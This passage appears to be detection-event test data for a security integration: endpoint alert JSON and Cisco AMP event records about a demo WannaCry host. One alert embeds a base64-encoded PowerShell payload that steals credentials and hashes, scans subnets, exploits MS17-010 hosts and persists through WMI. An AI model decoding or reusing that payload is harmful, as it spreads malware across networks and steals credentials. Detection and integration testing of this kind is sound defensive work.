UAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 